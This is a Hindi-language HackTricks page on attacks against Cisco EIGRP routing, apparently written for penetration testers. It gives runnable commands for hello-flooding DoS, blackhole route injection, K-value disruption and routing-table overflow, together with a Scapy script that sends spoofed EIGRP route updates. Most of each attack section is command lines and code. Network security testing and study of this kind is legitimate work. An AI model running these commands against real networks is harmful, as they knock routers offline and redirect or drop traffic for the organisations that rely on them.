EIGRP हमले
Tip
AWS हैकिंग सीखें और अभ्यास करें:
HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें:HackTricks Training GCP Red Team Expert (GRTE)
Azure हैकिंग सीखें और अभ्यास करें:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाओं की जांच करें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।
यह उन हमलों का सारांश है जो https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 में दिखाए गए हैं। अधिक जानकारी के लिए उसे देखें।
Fake EIGRP Neighbors Attack
- उद्देश्य: EIGRP hello packets से router CPU को ओवरलोड करके उन्हें Denial of Service (DoS) तक पहुँचाना।
- उपकरण: helloflooding.py स्क्रिप्ट।
- क्रियान्वयन:
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
- पैरामीटर:
--interface: नेटवर्क इंटरफ़ेस निर्दिष्ट करता है, उदाहरण के लिएeth0।--as: EIGRP autonomous system नंबर निर्दिष्ट करता है, उदाहरण के लिए1।--subnet: सबनेट स्थान सेट करता है, उदाहरण के लिए10.10.100.0/24।
EIGRP Blackhole Attack
- उद्देश्य: एक गलत route इंजेक्ट करके नेटवर्क ट्रैफ़िक फ्लो को विखलित करना, जिससे ट्रैफ़िक एक ऐसे गंतव्य (blackhole) की ओर चला जाए जो अस्तित्व में नहीं है।
- उपकरण: routeinject.py स्क्रिप्ट।
- क्रियान्वयन:
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
- पैरामीटर:
--interface: attacker की सिस्टम इंटरफ़ेस निर्दिष्ट करता है।--as: EIGRP AS नंबर निर्दिष्ट करता है।--src: attacker का IP पता सेट करता है।--dst: target subnet IP सेट करता है।--prefix: target subnet IP का मास्क निर्दिष्ट करता है।
Abusing K-Values Attack
- उद्देश्य: K-values बदलकर EIGRP डोमेन में लगातार व्यवधान और पुनः कनेक्शन उत्पन्न करना, जिससे परिणामस्वरूप DoS हमला हो सके।
- उपकरण: relationshipnightmare.py स्क्रिप्ट।
- क्रियान्वयन:
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
- पैरामीटर:
--interface: नेटवर्क इंटरफ़ेस निर्दिष्ट करता है।--as: EIGRP AS नंबर निर्दिष्ट करता है।--src: वैध राउटर का IP Address सेट करता है।
Routing Table Overflow Attack
- उद्देश्य: असली राउटर के CPU और RAM पर दबाव डालने के लिए routing table को अनेक गलत रूट्स से भर देना।
- उपकरण: routingtableoverflow.py स्क्रिप्ट।
- क्रियान्वयन:
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
- पैरामीटर:
--interface: नेटवर्क इंटरफ़ेस निर्दिष्ट करता है।--as: EIGRP AS नंबर निर्दिष्ट करता है।--src: attacker का IP पता सेट करता है।
Protocol Notes Useful for Attacks
- HELLO packets carry K-values and neighbors only form when they match. यह K-value mismatch/relationship disruption हमलों का आधार है और यही कारण है कि mismatched K-values adjacency को रोकते हैं।
- The PARAMETER TLV (Type 0x0001) in HELLO (and initial UPDATE) carries K-values and Hold Time, इसलिए passive captures से सेगमेंट पर उपयोग किए गए सटीक मान दिखाई देते हैं।
Scapy पैकेट निर्माण (Route Injection / Fake Neighbors)
Scapy में EIGRP contrib layer आता है जिसमें EIGRPParam और EIGRPIntRoute जैसे TLV होते हैं, जो route injection के लिए UPDATEs बनाने के लिए पर्याप्त हैं। उदाहरण davidbombal/scapy EIGRP route injection script से अनुकूलित:
from scapy.all import *
load_contrib("eigrp")
sendp(Ether()/IP(src="192.168.1.248", dst="224.0.0.10") /
EIGRP(opcode="Update", asn=100, seq=0, ack=0,
tlvlist=[EIGRPIntRoute(dst="192.168.100.0",
nexthop="192.168.1.248")]))
इसी repo में तेज़ “fake neighbor” स्क्रिप्ट्स हैं जो एक असली EIGRP पैकेट को sniff करके उसे एक spoofed स्रोत IP के साथ replay करती हैं ताकि phantom neighbors बनाए जा सकें (CPU/neighbor-table पर दबाव डालने के लिए उपयोगी)।
- Scapy EIGRP contrib डॉक्स: https://scapy.readthedocs.io/en/latest/api/scapy.contrib.eigrp.html
- Example scripts: https://github.com/davidbombal/scapy
Routopsy & NSE सहायक
- Routopsy एक वर्चुअल-राउटर अटैक लैब बनाता है (FRRouting + Scapy) और इसमें DRP attacks शामिल हैं जिन्हें आप EIGRP tests के लिए अनुकूलित कर सकते हैं। https://sensepost.com/blog/2020/routopsy-hacking-routing-with-routers/
- Nmap का NSE एक छोटी
eigrpलाइब्रेरी प्रदान करता है जो EIGRP पैकेट्स के एक subset को parsing/generating के लिए उपयोगी है। https://nmap.org/nsedoc/lib/eigrp.html
Authentication Recon
- EIGRP named mode HMAC-SHA-256 authentication का समर्थन करता है via
authentication mode hmac-sha-256 ...। यदि सक्षम है, तो crafted packets को सही key के साथ authenticated होना होगा; यदि सक्षम नहीं है, तो spoofing/injection को validate करना आसान होता है।
संदर्भ
- https://www.rfc-editor.org/rfc/rfc7868.html
- https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/iproute_eigrp/configuration/15-mt/ire-15-mt-book/ire-sha-256.html
Tip
AWS हैकिंग सीखें और अभ्यास करें:
HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें:HackTricks Training GCP Red Team Expert (GRTE)
Azure हैकिंग सीखें और अभ्यास करें:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाओं की जांच करें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।


